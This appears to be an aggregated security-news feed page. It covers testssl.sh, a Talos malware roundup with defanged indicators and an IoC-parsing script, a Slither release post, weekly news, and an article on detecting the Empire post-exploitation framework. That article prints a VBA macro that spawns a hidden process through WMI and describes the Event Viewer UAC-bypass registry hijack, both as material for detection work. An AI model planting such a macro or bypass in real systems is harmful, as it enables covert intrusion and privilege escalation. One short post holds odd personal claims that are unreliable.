Security Posts

testssl.sh – Test SSL Security Including Ciphers, Protocols & Detect Flaws

Darknet - The Darkside - 5 hours 55 min ago
testssl.sh is a free command line tool to test SSL security. It checks a server's service on any port for support of TLS/SSL ciphers and protocols, as well as for recent cryptographic flaws, and more. testssl.sh is highly portable: it runs on every Linux, Mac OS X and FreeBSD distribution and on MSYS2/Cygwin (slowly), and it is intended to work on any other Unix-like system as well. A newer OpenSSL version (1.0) is recommended, though.
Categories: Security Posts

Dancho Danchev's 2010 Disappearance - An Elaboration - Part Two

UPDATE: It appears that I'm currently persistently experiencing a pressure on my mouth including something in the lines of a toxic chemical on my nose. UPDATE: It appears that someone managed to map my place including my head and body using rubber and is persistently trying to communicate with me. UPDATE: In case you're interested in contacting me in terms of my law enforcement issues and

Dates for next week: Events, Courses, Talks and Conferences

As usual, I use one of the weekend days to bring you the dates for the coming week. This time it is not very packed, having already gone through LUCA Innovation Day 2018 and the Late Motiv with Movistar Home, but we still have things ahead of us with the Security Innovation Day and a few more surprises before the year ends. For now, here are this week's dates, and there are quite a few.

Figure 1: Dates for next week: Events, Courses, Talks and Conferences

22 to 24 Oct: UN World Data Forum [Dubai]
The forum organised by the Federal Competitiveness and Statistics Authority of the United Arab Emirates will host experts from around the world to address the SDGs set by the UN for 2030. Pedro Antonio de Alarcón, head of the Big Data for Social Good programme in our LUCA unit, will speak in the plenary “Improving Migration Statistics – the way forward”, on the social needs raised by new migration trends and how Big Data can help meet these challenges and improve migration policy in the various member countries.

23 to 26 Oct: Colombia 4.0 [Colombia]
During these days, the MinisterioTIC (MinTIC) is organising sessions focused on innovation and the digital transformation of organisations, in which our colleague Claudio Caracciolo, CSA at ElevenPaths, will take part to talk about how innovation can be adapted to everyday work processes.

24 Oct: Data Science Awards [Madrid] [G]
Once again this year, Synergic Partners, our company specialising in Big Data consulting and analytics within Telefónica's LUCA unit, launches the Data Science Awards 2018, prizes that aim to recognise Big Data professionals and the best business and data journalism initiatives in this field, and thereby promote analytical talent in Spain. This is the day the prizes are presented to the winners.

24 to 26 Oct: Security in Electronic Payment Media [Buenos Aires]
At this event, our colleague Claudio Caracciolo of ElevenPaths will give a session on the second day, with a talk focused on the risks to payment media when the protections on mobile devices are not robust enough.

25 October: Leaders of Digital Transformation [Madrid] [*]
El País Retina is organising a day in Madrid, at the Reina Sofía museum, where I will give a session on our AURA and Movistar Home to improve interaction with a company's IT systems. The day is full of very interesting speakers, so check the schedule and talks on the website.
Figure 2: Retina LTD

25 October: Thinking Party 2018 "Artificial Intelligence" [Madrid] [Streaming] [G] [*]
Also on 25 October, and also in Madrid, the Thinking Party 2018 takes place at Fundación Telefónica, with morning and afternoon sessions devoted entirely to Artificial Intelligence. And yes, I will be there to talk about our beloved AURA, Telefónica's Artificial Intelligence. The full agenda is on the event website:
Figure 3: Thinking Party 2018
Important note on Thinking Party 2018: you can follow the day via streaming, so wherever you are from or wherever you are, you can follow all the sessions over the Internet.

26 and 27 October: SecAdmin [Seville]
On Friday and Saturday of the coming week it is the turn of the fifth edition of SecAdmin in Seville, where 0xWord will be present so you can get our publisher's books. You can also ask Elias Grande to sign any copies you like of his book Docker: SecDevOps. The speakers include Deepak Daswani, who is CSA at ElevenPaths in the Canary Islands. All the information is on the conference website.
Figure 4: SecAdmin in Seville

27 October: BitUp [Alicante]
And to close this list of activities, on Saturday there is a very interesting day in Alicante, with lots of new young speakers who will devote the first day of the weekend to talking about technology and security and to enjoying sharing. 0xWord will also be present at this event, so you can get our books right there. The full agenda is on the event website.
Figure 5: BitUp Alicante

And that is everything ahead of us for the coming week. As you can see, in our LUCA, ElevenPaths, 0xWord, 4th Platform, Aura and Movistar Home teams we are very active in the outreach communities, so there is always some event every week.
Saludos Malignos!

Historical OSINT - Gumblar Botnet Infects Thousands of Sites Serves Adobe Flash Exploits

According to security researchers, the Gumblar botnet is making a comeback, successfully affecting thousands of users globally and potentially compromising the confidentiality, availability and integrity of the targeted hosts through a multitude of domains serving malicious client-side exploits that further drop malicious software on the affected hosts. In this post we'll provide actionable intelligence on

Threat Roundup for October 12 to October 19

Cisco Talos - Fri, 2018/10/19 - 22:39

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Oct. 12 and 19. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
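The indicator blocks later in this post use defanged values such as 151[.]80[.]159[.]160 and myp0nysite[.]ru. As an added example, not code from the Talos post, this Python script parses one block in that layout into structured lists, refangs the network indicators, and matches them against constructed proxy log lines; the log format and SAMPLE_LOGS are assumptions, and, as the paragraph above says, a hit is a lead to investigate rather than a verdict.

```python
import re
from typing import Dict, List, Tuple

# Section headers exactly as the roundup prints them, mapped to short keys.
SECTION_MAP = {
    "Registry Keys": "registry",
    "Mutexes": "mutexes",
    "IP Addresses contacted by malware": "ips",
    "Domain Names contacted by malware": "domains",
    "Files and or directories created": "files",
    "File Hashes": "hashes",
}
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
DST_RE = re.compile(r"\bdst=([^:\s]+)")

# Constructed sample block in the roundup's layout; the values are the ones the
# post's Tspy section lists (they are indicators, not a verdict on their own).
SAMPLE_BLOCK = r"""
Win.Malware.Tspy-6721070-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
    • Value Name: F
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 151[.]80[.]159[.]160
Domain Names contacted by malware. Does not indicate maliciousness
  • myp0nysite[.]ru
Files and or directories created
  • %LocalAppData%\Temp\-218562641.bat
File Hashes
  • 22ef53123754caa2ac3871eb01221c99482e4318b59a30c8f07b9525afae52bd
"""

# Constructed proxy log lines (hypothetical format: "dst=<host>:<port>").
SAMPLE_LOGS = [
    "2018-10-15T10:01:02Z proxy src=10.0.0.5 dst=myp0nysite.ru:80 GET /gate.php",
    "2018-10-15T10:01:09Z proxy src=10.0.0.5 dst=151.80.159.160:443 CONNECT",
    "2018-10-15T10:02:00Z proxy src=10.0.0.7 dst=www.example.org:443 CONNECT",
]


def refang(value: str) -> str:
    """Undo the '[.]' defanging so the value can be compared with real log data."""
    return value.replace("[.]", ".")


def parse_ioc_block(text: str) -> Dict[str, List[str]]:
    """Turn one family's IoC block into lists keyed by section.

    'N/A' placeholders are dropped, 'Value Name:' sub-bullets are attached to
    the registry key above them, network indicators are refanged and
    lower-cased, and hashes are checked to be well-formed SHA-256 hex.
    """
    iocs: Dict[str, List[str]] = {key: [] for key in SECTION_MAP.values()}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key = next((k for h, k in SECTION_MAP.items() if line.startswith(h)), None)
        if key is not None:
            section = key
            continue
        if section is None or not line.startswith("•"):
            continue  # family name, 'Indicators of Compromise', etc.
        item = line.lstrip("•").strip()
        if item == "N/A":
            continue
        if item.startswith("Value Name:") and iocs[section]:
            iocs[section][-1] += " | " + item
            continue
        if section in ("ips", "domains"):
            item = refang(item).lower()
        if section == "hashes" and not SHA256_RE.match(item):
            raise ValueError(f"malformed SHA-256 hash: {item!r}")
        iocs[section].append(item)
    return iocs


def match_network_iocs(iocs: Dict[str, List[str]], log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, destination) for log lines whose destination is a listed IP or domain."""
    watch = set(iocs["ips"]) | set(iocs["domains"])
    hits: List[Tuple[int, str]] = []
    for number, line in enumerate(log_lines, 1):
        found = DST_RE.search(line)
        if found and found.group(1).lower() in watch:
            hits.append((number, found.group(1)))
    return hits


if __name__ == "__main__":
    parsed = parse_ioc_block(SAMPLE_BLOCK)
    for number, dest in match_network_iocs(parsed, SAMPLE_LOGS):
        # A hit is a lead to investigate, not proof of infection (see the post's caveat).
        print(f"line {number}: destination {dest} matches a roundup indicator")
```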

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Dgoh-6721301-0
    Malware
    This family is a generic trojan able to steal browser passwords. The samples contain hidden hollowing techniques and TLS callbacks, making them more difficult to analyze. This malware is also evasive and can identify virtual environments. In this case, it does not show any network activity. The binaries achieve persistence and inject code into the address space of other processes.
     
  • Win.Malware.Tspy-6721070-0
    Malware
    Tspy is a trojan with several functions. It achieves system persistence to survive reboots. It also contacts domains related to remote access trojans (RATs) that are also known to host C2 servers which send additional commands to the malware. The samples are packed and may hinder analysis with anti-debugging techniques and TLS callbacks.
     
  • Win.Packed.Shipup-6718719-0
    Packed
    This signature and the IOCs cover the packed version of Shipup. These samples are packed and gain persistence by creating a scheduled task to carry out their activities. They also inject malicious code into the address space of other processes and may hinder analysis with anti-debugging and anti-virtual-machine checks.
     
  • Win.Malware.Icloader-6718315-0
    Malware
    Icloader is a generic malware family with heavy adware behavior. The samples are packed and have evasive checks to hinder analysis and conceal their real activities. This family can inject code into the address space of other processes and upload files to a remote server.
     
  • Win.Malware.Dfni-6718298-0
    Malware
    Dfni exhibits adware behaviors and can be considered generic malware. The samples are packed and contain anti-VM checks, as well as many anti-debugging techniques. The binaries hook functions on the system and inject code to perform their malicious activities and upload files to a remote server.
     
  • Win.Malware.Mikey-6718286-0
    Malware
    This cluster focuses on malware that gives other malware the ability to achieve persistence. The samples contain anti-analysis tricks as well, which makes it tougher to study. This family is known for its plugin architecture and its intense network activity.
     
  • Win.Malware.Dinwod-6718271-0
    Malware
    This family is a polymorphic dropper. It copies modified versions of itself to the root directory with random names, then deletes the original files. These binaries drop a DLL that is injected. All the binaries are packed and contain tricks to complicate the static analysis phase.
     
  • Win.Malware.Triusor-6717792-0
    Malware
    Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder static analysis. The malware contains code to complicate dynamic analysis. Once executed, the samples perform code injection.
     
Threats

Win.Malware.Dgoh-6721301-0
Indicators of Compromise
Registry Keys
  • <HKLM>\Software\Wow6432Node\Microsoft\WBEM\CIMOM
  • <HKLM>\SOFTWARE\CLASSES
  • <HKLM>\Software\Microsoft\Fusion\GACChangeNotification\Default
Mutexes
  • Global\CLR_CASOFF_MUTEX
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • \PC*\MAILSLOT\NET\NETLOGON
  • %LocalAppData%\Temp\tmp3456.tmp
  • %LocalAppData%\Temp\bhv35DC.tmp
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Tspy-6721070-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKLM>\System\CurrentControlSet\Control\DeviceClasses
  • <HKCU>\Software\Microsoft\SystemCertificates\MY
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003E9
    • Value Name: F
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000001F5
    • Value Name: F
  • <HKLM>\SAM\SAM\DOMAINS\ACCOUNT\USERS\000003EC
    • Value Name: F
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 151[.]80[.]159[.]160
Domain Names contacted by malware. Does not indicate maliciousness
  • myp0nysite[.]ru
Files and or directories created
  • %System32%\config\SAM
  • %LocalAppData%\Temp\-218562641.bat
  • \TEMP\3101985327.exe
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid, Umbrella

Win.Packed.Shipup-6718719-0
Indicators of Compromise
Registry Keys
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value Name: LoadAppInit_DLLs
  • <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
    • Value Name: AppInit_DLLs
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{F2B28AC6-1443-43F4-9832-8315397F35E8}
  • <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\HANDSHAKE\{F2B28AC6-1443-43F4-9832-8315397F35E8}
    • Value Name: data
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\PROGRA~3\Mozilla\thfirxd.exe
  • %System32%\Tasks\aybbmte
  • %SystemDrive%\PROGRA~3\Mozilla\lygbwac.dll
  • %SystemDrive%\DOCUME~1\ALLUSE~1\APPLIC~1\Mozilla\kvlcuie.dll
  • %SystemDrive%\DOCUME~1\ALLUSE~1\APPLIC~1\Mozilla\tfbkpde.exe
  • %WinDir%\Tasks\kylaxsk.job
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Icloader-6718315-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKCU>\Software\Microsoft\SystemCertificates\My
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\Certificates
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CRLs
  • <HKCU>\SOFTWARE\POLICIES\MICROSOFT\SYSTEMCERTIFICATES\CA\CTLs
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\Root
  • <HKLM>\Software\Wow6432Node\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Wow6432Node\Policies\Microsoft\SystemCertificates\trust
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]201[.]249[.]16
  • 5[.]149[.]248[.]134
  • 185[.]87[.]195[.]36
Domain Names contacted by malware. Does not indicate maliciousness
  • static[.]16[.]249[.]201[.]195[.]clients[.]your-server[.]de
  • official-site-cheats[.]ru
Files and or directories created
  • %WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
  • %LocalAppData%\Microsoft\Windows\WebCache\WebCacheV01.dat
  • \ROUTER
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Dfni-6718298-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • <HKLM>\Software\Microsoft\RAS AutoDial
Mutexes
  • \BaseNamedObjects\GenericSetupInstaller_UT006
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]201[.]249[.]16
  • 5[.]149[.]248[.]134
Domain Names contacted by malware. Does not indicate maliciousness
  • static[.]16[.]249[.]201[.]195[.]clients[.]your-server[.]de
Files and or directories created
  • \ROUTER
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\Carrier.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\GenericSetup.exe
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\GenericSetup.exe.config
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\7zSC54F3341\installer.exe
  • %TEMP%\Microsoft_Office_2003_Crack_Full_Version_Free.exe
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Mikey-6718286-0
Indicators of Compromise
Registry Keys
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
Mutexes
  • RasPbFile
  • Local\http://hao.360.cn/
  • Global\b002b2c1-cf34-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
Domain Names contacted by malware. Does not indicate maliciousness
Files and or directories created
  • %ProgramFiles% (x86)\DouTu\
  • %ProgramFiles% (x86)\DouTu\DouTuDaShi.exe
  • %ProgramFiles%\DouTu\DouTuDaShi.exe
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Dinwod-6718271-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • \vnnjj.exe
  • \xxhdx.exe
  • \xxldt.exe
  • \xxlhl.exe
  • \vnjvvj.exe
  • \rvrnnf.exe
  • \rxjxbdx.exe
  • \vnrjn.exe
  • \rvrnbj.exe
  • \xxltpx.exe
  • \vnnbn.exe
  • \vnjrv.exe
  • \xxltxdh.exe
  • \xxlhptp.exe
  • \xxhtp.exe
  • \xxxpptl.exe
  • \xxpxthd.exe
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid

Win.Malware.Triusor-6717792-0
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • \BaseNamedObjects\---
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %SystemDrive%\I386\FAXPATCH.EXE
  • %SystemDrive%\I386\NTSD.EXE
  • %SystemDrive%\I386\REGEDIT.EXE
  • %SystemDrive%\I386\SYSPARSE.EXE
  • %SystemDrive%\I386\AUTOCHK.EXE
  • %SystemDrive%\I386\AUTOFMT.EXE
  • %SystemDrive%\I386\EXPAND.EXE
  • %SystemDrive%\I386\SPNPINST.EXE
  • %SystemDrive%\I386\SYSTEM32\SMSS.EXE
  • %SystemDrive%\I386\TELNET.EXE
  • %ProgramFiles%\AutoIt3\SciTE\SciTE.exe
  • %ProgramFiles%\FileZilla FTP Client\filezilla.exe
  • %ProgramFiles%\Windows Media Player\wmplayer.exe
  • %ProgramFiles%\Windows NT\Accessories\wordpad.exe
  • %ProgramFiles%\Windows NT\Pinball\pinball.exe
  • %ProgramFiles%\Windows NT\dialer.exe
  • %ProgramFiles%\Windows NT\hypertrm.exe
File Hashes

Coverage
Screenshots of detection (images not included): AMP, ThreatGrid


Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF

Cisco Talos - Fri, 2018/10/19 - 18:37


Beers with Talos (BWT) Podcast Ep. #39 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #39 show notes: Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.
The timeline:
The topics
01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots
The links
Péter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true
==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).

Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com
Categories: Security Posts

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected

In 2008 it became evident that a widespread malware-embedded attack had successfully affected hundreds of iPowerWeb customers, potentially exposing hundreds of legitimate Web sites to a multitude of malicious software courtesy of a well-known Russian Business Network hosting provider, HostFresh. In this post we'll profile the campaign, provide actionable intelligence on the
Categories: Security Posts

Things I Hearted this Week, 19th October 2018

AlienVault Blogs - Fri, 2018/10/19 - 15:00
It’s been another eventful week in the world of cyber security. So let’s just jump right into it.

NCSC has Been Busy
NCSC collaborated with Australia, Canada, New Zealand, UK, and the USA to give us a report that highlights which publicly-available tools criminals are using to aid their cyber crimes. The agency also commented on how it keeps criminals at bay by stopping on average 10 attacks on the government per week. NCSC also published its Annual Review 2018 - the story of the second year of operations at the National Cyber Security Centre.

Targeting Crypto Currencies
It is estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from the Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534 million in crypto was stolen.

Twitter Publishes Data on Iranian and Russian Troll Farms
In an attempt to be more proactive in dealing with misinformation campaigns, Twitter has published its Elections Integrity dataset, which includes attempted manipulation, including malicious automated accounts and spam. In other words, it’s attempting to out Iranian and Russian troll farms. In light of this, it’s worth also revisiting this article by Mustafa Al-Bassam in which he researched UK intelligence doing the same thing targeting civilians in Iran.

Equifax Engineer Sentenced
An Equifax engineer gets eight months for earning $75,000 from insider trading. He figured out that the web portal he was building was for a breach involving Equifax, which turned out to be the 2017 breach, and so decided to ride the stock drop.

Mind the Skills Gap
(ISC)2 has released its 2018 global cyber security workforce study and it looks like the cyber security skills gap has widened to 3 million.
It’s worth bearing in mind that estimating the skills gap isn’t an easy task. You have to look into the types of organisations, the tools in place, the risk appetite, economic, political, environmental factors, a whole bunch of things. You need a pretty deep methodology (don’t get me started on survey methodologies) to accurately assess the skills gap - so, a survey of 1500 individuals won’t necessarily be completely accurate, but serves as a good discussion point to start from. On the topic of the skills gap, there are plenty of free resources for learning available these days. Check out this awesome list:

GitHub Announcements
When Microsoft acquired GitHub, many speculated this was the end of the site. On the contrary, a series of new features and enhancements shows GitHub ploughing forward in leaps and bounds.

California to Change State Law for Connected Devices
In a bid to strengthen cyber security, California passed a state law requiring all manufacturers of internet connected devices to improve their security features. By 2020, in order to sell their products in California, manufacturers will need to ensure that devices such as home routers have a unique pre-programmed password or an enforced user authentication process as part of the set up. Default passwords such as ‘password’ or ‘default’ will be deemed weak and in breach of the state law. A great initiative, but part of me feels like it’s a bit premature.

Why tech companies need to reinvent themselves every three to four years
Former Cisco CEO John Chambers says doing the same thing, even if it’s the “right thing,” for too long is dangerous.

The CumEx Files investigation
Finally, a long but fascinating read into a huge, months-long investigation that involved the cooperation of dozens of international partners to uncover how some of the wealthiest have swindled European taxpayers out of billions.
Categories: Security Posts

Slither – a Solidity static analysis framework

Slither is the first open-source static analysis framework for Solidity. Slither is fast and precise; it can find real vulnerabilities in a few seconds without user intervention. It is highly customizable and provides a set of APIs to inspect and analyze Solidity code easily. We use it in all of our security reviews. Now you can integrate it into your code-review process.

We are open sourcing the core analysis engine of Slither. This core provides advanced static-analysis features, including an intermediate representation (SlithIR) with taint tracking capabilities, on top of which complex analyses (“detectors”) can be built. We have built many detectors, including ones that detect reentrancy and suicidal contracts. We are open sourcing some as examples. If you are a smart-contract developer, a security expert, or an academic researcher, then you will find Slither invaluable.

Built for continuous integration
Slither has a simple command line interface. To run all of its detectors on a Solidity file, this is all you need:
$ slither contract.sol
You can integrate Slither into your development process without any configuration. Run it on each commit to check that you are not adding new bugs.

Helps automate security reviews
Slither provides an API to inspect Solidity code via custom scripts. We use this API to rapidly answer unique questions about the code we’re reviewing. We have used Slither to:
  • Identify code that can modify a variable’s value.
  • Isolate the conditional logic statements that are influenced by a particular variable’s value.
  • Find other functions that are transitively reachable as a result of a call to a particular function.
For example, the following script will show which function(s) in myContract write to the state variable myVar:

# function_writing.py
import sys
from slither.slither import Slither

if len(sys.argv) != 2:
    print('usage: python function_writing.py file.sol')
    sys.exit(1)

# Init slither
slither = Slither(sys.argv[1])

# Get the contract
contract = slither.get_contract_from_name('myContract')

# Get the variable
myVar = contract.get_state_variable_from_name('myVar')

# Get the functions writing the variable
funcs_writing_myVar = contract.get_functions_writing_to_variable(myVar)

# Print the result
print('Functions that write to "myVar": {}'.format([f.name for f in funcs_writing_myVar]))

Figure 1: Slither API Example

Read the API documentation and the examples to start harnessing Slither.

Aids in understanding contracts
Slither comes with a set of predefined “printers” which show high-level information about the contract. We included four that work out-of-the-box to print essential security information: a contract summary, a function summary, a graph of inheritance, and an authorization overview.
1. Contract summary printer: gives a quick summary of the contract, showing the functions and their visibility.
Figure 2: Contract Summary Printer
2. Function summary printer: shows useful information for each function, such as the state variables read and written, or the functions called.
Figure 3: Function Summary Printer
3. Inheritance printer: outputs a graph highlighting the inheritance dependencies of all the contracts.
Figure 3: Function Summary Printer
4. Authorization printer: shows what a user with privileges can do on the contract.
Figure 4: Authorization Printer
See Slither’s documentation for information about adding your own printers.

A foundation for research
Slither uses its own intermediate representation, SlithIR, to build innovative vulnerability analyses on Solidity. It provides access to the CFG of the functions, the inheritance of the contracts, and lets you inspect Solidity expressions. Many academic tools, such as Oyente or MAIAN, advanced the state of the art when they were released. However, each academic team had to invent its own framework, built only for the limited scope of its particular area of interest. Maintenance quickly became a challenge. In contrast, Slither is a generic framework. Because it is capable of the widest possible range of security analyses, it is regularly maintained and used by our open source community. If you are an academic researcher, don’t spend time and effort parsing and recovering information from smart contracts. Prototype your new innovations on top of Slither, complete your research sooner, and ensure it maintains its utility over time. It’s easy to extend Slither’s capabilities with new detector plugins. Read the detector documentation to start writing your own.

Next steps
Slither can find real vulnerabilities in a few seconds with minimal or no user interaction. We use it on all of our Solidity security reviews. You should too! Many of our ongoing projects will improve Slither, including:
  • API enhancements: Now that we have open sourced the core, we intend to provide the most effective static analysis framework possible.
  • More precise built-in analyses: We plan to make several new layers of information, such as value tracking, accessible to the API.
  • Toolchain integration: We plan to combine Slither with Manticore, Echidna, and Truffle to automate the triage of issues.
Questions about Slither’s API and its core framework? Join the Empire Hacking Slack. Need help integrating Slither into your development process? Want access to our full set of detectors? Contact us.
Categories: Security Posts

Detecting Empire with USM Anywhere

AlienVault Blogs - Thu, 2018/10/18 - 20:13
Empire is an open source post-exploitation framework that acts as a capable backdoor on infected systems.  It provides a management platform for infected machines. Empire can deploy PowerShell and Python agents to infect both Windows and Linux systems. Empire can:
  • Deploy fileless agents to perform command and control.
  • Exploit vulnerabilities to escalate privileges.
  • Install itself for persistence.
  • Steal user credentials.
It has also evolved to support the initial phases of an attack, and can create malicious documents to deploy its agent. Empire’s features are classified into listeners, stagers and modules. Below, we describe how AlienVault USM can detect these stages on a Windows target.

Staging
Empire first attempts to deploy an agent using one of multiple stager modules. USM generically detects the agent once PowerShell is invoked with an encoded payload. Commands executed with encoded arguments are commonly used by attackers as an obfuscation technique, so they produce the USM alert ‘Defense Evasion - Obfuscated Command - Powershell Execution of Encoded Command’. This alert detects most Empire stagers on Windows when they use PowerShell to execute an encoded command. If enabled, Windows Defender, through the Antimalware Scan Interface (AMSI), should also block the PowerShell command; the ‘Malware Infection - Windows Defender Malware Detected’ alert shows the information needed to locate the malicious file.

An alternative for an attacker is to craft an Office document with a macro that executes the agent command by spawning a Windows process through the WMI service:

' str holds the PowerShell command line the agent should run
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = 0
Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process")
objProcess.Create str, Null, objConfig, intProcessID

When the macro runs, WMI creates the new process. USM watches the Windows events for this WMI-driven process creation, which is also commonly used in lateral movement scenarios, and raises the ‘Lateral Movement - Remote WMIC Activity’ alert displaying the malicious PowerShell command.

Another way for an attacker to implant the Empire agent on a victim’s machine is to create an HTML Application using the Empire module windows/hta. On a weakly configured system, a simple spear-phishing mail with a link to the crafted HTML Application will be enough to get the agent running. For each alert, USM provides detailed information about the nature of the issue and useful recommendations for the security staff to follow. As this is a common technique for installing malware, USM identifies applications such as PowerShell launched by HTML Applications; in this instance, USM creates an alarm for ‘Code Execution - Suspicious Process Created by mshta.exe’.

Escalating Privileges
After infection, the attacker will try to escalate privileges, for which they can use one of Empire’s ‘privesc’ modules. One of the most dangerous tries to bypass Windows UAC by abusing the native Event Viewer. When Event Viewer (eventvwr.exe, an auto-elevating binary) runs, it looks up the command used to launch mmc.exe under HKCU\Software\Classes\mscfile\shell\open\command, a key the current user can write. An attacker can therefore place their own command there and have it run at high integrity. Doing so is a registry key hijack attempt, which the AlienVault agent detects and USM reports as a ‘Privilege Escalation - Windows UAC Bypass’ alert.

Empire C&C
The Empire agent accesses the network through a crafted PowerShell command. Although this command combines a number of obfuscation techniques (such as case switching) and Base64 encoding, some features of its structure are invariant and allow for detection. When the decoded command is recorded by the ‘Windows Powershell Login Channel’ event source and sent to the USM engine, it triggers a ‘Hacking Tool - Powershell Empire agent CnC activity’ alert announcing that Empire has been detected on the machine.

Other features
The Empire framework also provides several modules to enable persistence on the infected machine, such as scheduled tasks, a number of registry keys, or WMI event subscriptions. USM Anywhere raises a low-priority alarm for each scheduled task created; these alerts provide the full task content, the responsible user, and other key data.

